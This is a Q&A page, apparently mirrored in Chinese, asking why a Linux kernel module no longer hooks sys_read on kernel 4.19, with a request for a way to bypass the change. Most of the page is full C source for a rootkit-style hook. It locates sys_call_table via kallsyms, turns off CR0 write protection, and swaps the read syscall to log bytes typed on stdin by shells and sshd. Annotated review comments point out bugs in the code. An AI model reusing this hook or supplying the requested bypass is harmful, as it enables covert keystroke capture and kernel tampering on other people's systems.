linux内存隔离,c - 新Linux内核中的内存隔离,还是什么? - SO中文参考 - www.soinside.com...

当时的环境是 Linux 内核 4.12,Kali 2018.1。

现在,我已经安装了最新版本的Kali - 2019.1。它使用内核4.19:

Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 GNU/Linux

我试图截获任何读取调用,但流程中从未出现 fd == 0 的情况。

I've googled for a long long time, tried to read changelogs on different resources...

我发现了这样的模块kpti,可能会做类似的事情,但这个模块没有安装在Kali 2019.1中。

请帮我找出这段代码中 hacked_read 不再截获 sys_read() 的确切原因:

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define BUFFER_SIZE 512

#define MODULE_NAME "hacked_read"

/* Conditional debug print. `debug` is not declared anywhere in this listing and dbg() is never expanded, so it compiles only because it is unused. */
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )

/* Log helpers prefixed with the module name; callers supply the trailing newline. */
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )

#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )

#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )

MODULE_DESCRIPTION( MODULE_NAME );

MODULE_VERSION( "0.1" );

MODULE_LICENSE( "GPL" );

MODULE_AUTHOR( "module author " );

/* Accumulates the first byte of each read() on fd 0 (see hacked_read_test). Static storage, so it starts zeroed, i.e. as the empty string. Shared by all CPUs with no lock. */
static char debug_buffer[ BUFFER_SIZE ];

/* Original sys_call_table entry for read, saved by hacked_read_init. NOTE(review): declared as returning unsigned long while the kernel's read returns a signed ssize_t, so negative error codes come back as large positive values. */
unsigned long ( *original_read ) ( unsigned int, char *, size_t );

/* Address of the syscall table as resolved by find_sym() in hacked_read_init; never checked for NULL before use. */
void **sct;

/* Number of intercepted reads on fd 0. Incremented without atomics or locking. Neither this nor the two pointers above are static, so they have external linkage. */
unsigned long icounter = 0;

/*
 * Make read-only kernel memory writable on the current CPU: executes CLI
 * (interrupts off on this CPU) and clears bit 16 of CR0, the write-protect
 * (WP) flag; the mask 0xfffffffffffeffff clears exactly that bit.  RAX is
 * saved and restored by hand because the asm declares no clobber list.
 * NOTE(review): there is no "memory" clobber either, so the compiler is free
 * to move memory accesses across this statement; the callers rely on program
 * order for the sct[] store that follows.  Interrupts stay off until
 * rw_disable() executes STI.
 */
static inline void rw_enable( void ) {

asm volatile ( "cli \n"

"pushq %rax \n"

"movq %cr0, %rax \n"

"andq $0xfffffffffffeffff, %rax \n"

"movq %rax, %cr0 \n"

"popq %rax " );

}

/*
 * Return the current value of control register CR0.  Reading CR0 is a
 * privileged instruction, so this is only meaningful in kernel context.
 * `register` is merely a hint to the compiler.
 */
static inline uint64_t getcr0(void) {

register uint64_t ret = 0;

asm volatile (

"movq %%cr0, %0\n"

:"=r"(ret)

);

return ret;

}

/*
 * Write @val back into CR0 — callers pass the value captured by getcr0()
 * before rw_enable(), so the WP flag returns to whatever it was — and then
 * execute STI.
 * NOTE(review): STI is unconditional, mirroring the unconditional CLI in
 * rw_enable(); the interrupt state that existed before the CLI is neither
 * saved nor restored.
 */
static inline void rw_disable( register uint64_t val ) {

asm volatile(

"movq %0, %%cr0\n"

"sti "

:

:"r"(val)

);

}

/*
 * Resolve a kernel symbol by exact name through kallsyms_on_each_symbol().
 * Returns the address of the first symbol whose name strcmp()-matches @sym.
 *
 * NOTE(review): `faddr` is static and is never reset, so when nothing matches
 * the function returns the result of the previous call (0, i.e. NULL, only on
 * the very first call).  hacked_read_init() does not check the result.
 * Whether kallsyms_on_each_symbol() is callable from a module depends on the
 * kernel version and configuration — TODO confirm for the kernel in use.
 */
static void* find_sym( const char *sym ) {

static unsigned long faddr = 0; // static !!!

// ----------- nested functions are a GCC extension ---------

/* Called once per symbol. The inner `sym` parameter shadows the outer one; the searched name arrives through `data`. A non-zero return is meant to stop the walk. */
int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {

if( 0 == strcmp( (char*)data, sym ) ) {

faddr = addr;

return 1;

} else return 0;

};// --------------------------------------------------------

kallsyms_on_each_symbol( symb_fn, (void*)sym );

return (void*)faddr;

}

/*
 * Replacement sys_call_table entry for read.  Reads on any fd other than 0
 * are forwarded untouched to original_read().  For fd 0 the call is counted,
 * forwarded, and then the first byte of @buf is appended to debug_buffer;
 * the buffer is emptied once its length exceeds BUFFER_SIZE - 100, so the
 * one-byte strncat() cannot overflow it.  Every 1000th fd-0 call logs the
 * counter and the current buffer length.
 *
 * NOTE(review) — defects visible in this body:
 *  - @buf is the caller's destination pointer, i.e. user-space memory, and
 *    strncat() reads it directly from kernel context with no
 *    copy_from_user()/access_ok(); that is unsafe and faults on kernels
 *    running with SMAP enabled.
 *  - The byte is appended even when the forwarded read returned 0 or an
 *    error, in which case buf[0] holds stale data.
 *  - "%ld" is used for an unsigned long and for a size_t; "%lu" and "%zu"
 *    are the matching specifiers.
 *  - debug_buffer and icounter are updated without any lock, so concurrent
 *    reads on different CPUs race.
 */
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {

unsigned long r = 1;

if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)

return original_read( fd, buf, count );

} else {

icounter++;

if ( icounter % 1000 == 0 ) {

info( "test2 icounter = %ld\n", icounter );

info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );

}

r = original_read( fd, buf, count );

/* Appends at most one byte plus a terminator; appends nothing if buf[0] is '\0'. */
strncat( debug_buffer, buf, 1 );

if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )

debug_buffer[0] = '\0';

return r;

}

}

/*
 * Module entry point: locate sys_call_table via kallsyms, save the current
 * read entry in original_read, clear CR0.WP with interrupts off on this CPU,
 * install hacked_read_test in its place, then restore CR0.  Always returns 0,
 * so insmod reports success even when the lookup failed.
 *
 * NOTE(review): find_sym() may return NULL (or a stale address, see its
 * comment) and sct is dereferenced without a check, so a failed lookup oopses
 * here.  The code also assumes each table entry is a plain C function taking
 * (fd, buf, count); that assumption is never verified against the running
 * kernel.  Converting a data pointer to a function pointer, as done for
 * original_read, is not portable ISO C.
 */
int hacked_read_init( void ) {

register uint64_t cr0;

info( "Module was loaded\n" );

sct = find_sym( "sys_call_table" );

original_read = (void *)sct[ __NR_read ];

cr0 = getcr0();

rw_enable();

sct[ __NR_read ] = hacked_read_test;

rw_disable( cr0 );

return 0;

}

/*
 * Module exit: put the saved original entry back using the same CR0.WP /
 * interrupt sequence as hacked_read_init.
 * NOTE(review): nothing here waits for CPUs that may still be inside
 * hacked_read_test() when the module text is unloaded, and sct is again
 * dereferenced without a NULL check.
 */
void hacked_read_exit( void ) {

register uint64_t cr0;

info( "Module was unloaded\n" );

cr0 = getcr0();

rw_enable();

sct[ __NR_read ] = original_read;

rw_disable( cr0 );

}

/* Register the init/exit handlers with the module loader. */
module_init( hacked_read_init );

module_exit( hacked_read_exit );

Makefile文件:

# Out-of-tree kernel module build: delegates to the running kernel's build tree.
CURRENT = $(shell uname -r)

# Kernel build directory matching the running kernel.
KDIR = /lib/modules/$(CURRENT)/build

PWD = $(shell pwd)

TARGET = hacked_read

# Single-object module: $(TARGET).c -> $(TARGET).ko
obj-m := $(TARGET).o

# NOTE: recipe lines must begin with a tab in the real Makefile; the indentation was lost in this paste.
default:

$(MAKE) -C $(KDIR) M=$(PWD) modules

# Remove build products left behind by the kernel build system.
clean:

@rm -f *.o .*.cmd .*.flags *.mod.c *.order

@rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*

@rm -fR .tmp*

@rm -rf .tmp_versions

我确信和以前一样仍然有程序在调用 sys_read():tee、bash、vi——这些东西不可能在这么短的时间内全都改变,但 Linux 内核可以。

我会欣赏代码绕过。
